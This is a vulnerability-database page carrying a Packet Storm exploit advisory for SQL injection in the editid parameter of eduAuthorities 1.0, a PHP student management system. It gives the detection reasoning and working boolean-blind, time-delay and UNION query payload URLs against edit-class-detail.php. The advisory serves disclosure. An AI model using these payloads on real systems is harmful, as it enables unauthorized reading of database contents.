Lucene search
K
Database
Vendors
Products
Years
CVSS
Scanner
Agent Scanning
API Scanning
Manual Audit
Perimeter Scanner
Scanning
Projects
Email
Webhook
Plugins
Resources
Documents
Blog
Glossary
FAQ
Pricing
Contacts
About Us
Partners
Branding Guideline
packetstormNu11secur1tyPACKETSTORM:179919
HistoryAug 06, 2024 - 12:00 a.m.

eduAuthorities 1.0 SQL Injection

2024-08-0600:00:00
nu11secur1ty
packetstormsecurity.com
79
eduauthorities 1.0
sql injection
mayurik
vulnerability
exploits
response time
reference url

AI Score

7.4

Confidence

Low

JSON
`## Titles: eduAuthorities-1.0 Multiple-SQLi  
## Author: nu11secur1ty  
## Date: 07/29/2024  
## Vendor: https://www.mayurik.com/  
## Software:  
https://www.sourcecodester.com/php/16137/online-student-management-system-php-free-download.html  
## Reference: https://portswigger.net/web-security/sql-injection  
  
## Description:  
The editid parameter appears to be vulnerable to SQL injection attacks. The  
payloads 15750083 or 4189=04189 and 58006253 or 7709=7710 were each  
submitted in the editid parameter. These two requests resulted in different  
responses, indicating that the input is being incorporated into a SQL query  
in an unsafe way. Note that automated difference-based tests for SQL  
injection flaws can often be unreliable and are prone to false positive  
results. You should manually review the reported requests and responses to  
confirm whether a vulnerability is actually present.  
Additionally, the payload (select*from(select(sleep(20)))a) was submitted  
in the editid parameter. The application took 20011 milliseconds to respond  
to the request, compared with 3 milliseconds for the original request,  
indicating that the injected SQL command caused a time delay.The attacker  
can get all information from the system by using this vulnerability!  
  
STATUS: HIGH- Vulnerability  
  
  
[+]Exploits:  
- SQLi Multiple:  
```mysql  
---  
Parameter: #1* (URI)  
Type: boolean-based blind  
Title: MySQL OR boolean-based blind - WHERE, HAVING, ORDER BY or GROUP  
BY clause (EXTRACTVALUE)  
Payload: http://pwnedhost.com/eduauth/edit-class-detail.php?editid=-8488  
OR EXTRACTVALUE(2229,CASE WHEN (2229=2229) THEN 2229 ELSE 0x3A END)#  
UiVZfrom(select(sleep(3)))a)  
  
Type: UNION query  
Title: MySQL UNION query (random number) - 3 columns  
Payload: http://pwnedhost.com/eduauth/edit-class-detail.php?editid=-2962  
UNION ALL SELECT  
8651,8651,CONCAT(0x7176627a71,0x664c6c4a72786a466c676743684468646d676e646d476f535a4f4a64694375516a54746d52426253,0x7171766b71),8651#from(select(sleep(3)))a)  
---  
```  
  
## Reproduce:  
[href](https://www.patreon.com/posts/eduauthorities-1-109562178)  
  
## More:  
[href](  
https://www.nu11secur1ty.com/2024/08/eduauthorities-10-multiple-sqli.html)  
  
## Time spent:  
00:37:00  
  
  
`

AI Score

7.4

Confidence

Low

JSON